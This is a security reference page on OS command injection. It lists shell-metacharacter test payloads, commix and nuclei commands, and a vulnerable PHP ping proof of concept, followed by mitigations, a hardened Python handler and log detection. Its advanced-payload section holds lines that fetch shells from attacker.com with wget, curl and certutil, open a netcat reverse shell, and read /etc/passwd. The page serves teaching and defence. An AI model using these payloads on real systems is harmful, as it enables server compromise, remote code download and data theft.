Critical Severity | OWASP A03:2021
🔴 OS Command Injection
🧠 Description
What is Command Injection?
OS Command Injection allows attackers to execute arbitrary operating system commands on the server. It occurs when an application passes unsafe user input to a system shell.
Command Injection allows attackers to:
- Execute arbitrary OS commands
- Read/write files
- Escalate privileges
- Access sensitive data
- Pivot to internal network
- Install malware
🏷️ Classification
- Type: OS Command Injection (CWE-78)
- OWASP: A03:2021 - Injection
- Types: Direct shell execution, Code injection, Shell metacharacters
🎯 Attack Surface
- ✅ Ping functionality
- ✅ Traceroute functionality
- ✅ DNS lookup
- ✅ File processing (ffmpeg, ImageMagick)
- ✅ PDF generators
- ✅ Email forms
⚠️ Preconditions
- Application executes system commands
- User input used in command without sanitization
- No input validation or sanitization
🔍 Detection
Test Payloads:
```
; whoami
| whoami
& whoami
`whoami`
$(whoami)
```
🔧 Burp Suite Workflow
- Find parameter that might execute commands
- Inject test command: `; whoami`
- Check output for command execution
- Escalate to full shell access
⚙️ Tool Automation
- Commix: automatic command injection
- Burp Suite: manual testing
- nuclei: command injection templates
```bash
# commix
python commix.py --url="http://target.com/vuln?param=test"
# nuclei
nuclei -u "http://target.com" -t templates/cmdi.yaml
```
💣 Basic Payloads
🔧 Shell Metacharacters
; whoami
| whoami
& whoami
&& whoami
|| whoami
\n whoami
🔧 Command Substitution
`whoami`
$(whoami)
${IFS}whoami
🚀 Advanced Payloads
🐧 Linux
; cat /etc/passwd
; ls -la /var/www
; wget http://attacker.com/shell.sh
🪟 Windows
type C:\Windows\win.ini
dir C:\
certutil -urlcache -f http://attacker.com/shell.exe
🌐 Network
; curl -o /tmp/shell http://attacker.com/shell
; nc -e /bin/sh attacker.com 4444
📝 Proof of Concept
```php
// Vulnerable PHP code: the user-controlled host parameter is concatenated
// into a command string that system() hands to the shell
$host = $_GET['host'];
system("ping -c 1 " . $host);
```
Attack:
```
GET /ping?host=127.0.0.1;whoami
```
Output: `uid=33(www-data) gid=33(www-data)`
💥 Impact Analysis
Severity: CRITICAL (CVSS 10.0)
- Full server compromise
- Data breach
- Malware installation
- Pivot to internal network
- Complete system takeover
🔗 Attack Chains
Chain: Command Injection to RCE
- Find command injection point
- Inject reverse shell
- Gain shell access
- Escalate privileges
🛡️ Mitigation
✅ Avoid Shell Commands: Use APIs instead of system()
✅ Input Validation: Whitelist allowed characters
✅ Sandbox: Run commands in isolated environment
✅ Escape: Properly escape user input
🏰 Advanced Mitigation
```python
# Python: call subprocess with an argument list and no shell
import subprocess
subprocess.run(['ping', '-c', '1', host])  # no shell=True; host reaches ping as one argument
# Use argument-list (exec-style) execution instead of a shell command string
# Avoid: os.system(), shell_exec(), exec()
```
📊 Monitoring & Detection
- Alert on shell metacharacters in logs
- Monitor for system command execution
- Detect unusual process execution
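A hardened version of the ping handler from the Proof of Concept, added here as an illustration and not code from the original page; it combines the mitigation above (allow-list validation plus argv execution without a shell) with the metacharacter check the Monitoring section calls for. The helper names, the hostname pattern and the log lines are constructed for this example.

```python
import ipaddress
import re
import subprocess
from urllib.parse import unquote_plus

# Allow-list for the host parameter: an IP literal or an RFC 1123 style hostname.
_HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)*"
    r"[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?$", re.I)
# Metacharacters listed in the Detection section above, plus newline.
_SHELL_META_RE = re.compile(r"[;&|`$()\n]")

# Constructed sample access-log lines for the detection helper below.
SAMPLE_LOG = [
    "GET /ping?host=127.0.0.1 200",
    "GET /ping?host=127.0.0.1;whoami 200",
    "GET /ping?host=%24(whoami) 200",
]

def is_valid_host(value: str) -> bool:
    """Allow-list check (hypothetical helper): IP literal or valid hostname."""
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        return bool(_HOSTNAME_RE.match(value))

def build_ping_argv(host: str) -> list:
    """Return ping's argv, rejecting anything outside the allow-list."""
    if not is_valid_host(host):
        raise ValueError("invalid host parameter")
    # List form, no shell=True: even a value that slipped past validation
    # reaches ping as a single argument and is never parsed by a shell.
    return ["ping", "-c", "1", host]

def ping(host: str) -> subprocess.CompletedProcess:
    return subprocess.run(build_ping_argv(host), capture_output=True,
                          text=True, timeout=10)

def flag_suspicious_requests(log_lines):
    """Detection helper: request lines whose decoded query carries metacharacters."""
    flagged = []
    for line in log_lines:
        query = unquote_plus(line.split("?", 1)[1]) if "?" in line else ""
        if _SHELL_META_RE.search(query):
            flagged.append(line)
    return flagged
```

The query is URL-decoded before matching so that an encoded `%3B` or `%24` does not evade the check.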
🔐 Security Controls
| Control | Implementation |
|---|---|
| No Shell Commands | Use APIs instead of system() |
| Input Validation | Whitelist allowed chars |
| Sandboxing | Containerize applications |
🔓 Bypass Techniques
- Use newlines to bypass filters
- Environment variable injection
- Use base64 encoding
🛠️ Tools & Commands
- Commix: automated command injection
- Metasploit: exploit/unix/http/vulnerable
📚 References
🔄 Retest Steps
| Step | Action |
|---|---|
| 1 | Replace system() with API |
| 2 | Re-test with ; whoami |
| 3 | Verify no command execution |
⚙️ Detection Logic
Static: Find system(), exec() calls. Dynamic: Fuzz with command injection payloads.
🔎 Threat-Hunting
IOCs: Shell metacharacters in parameters, unusual process execution.
🛡️ Defensive
WAF rules, RASP, proper input validation.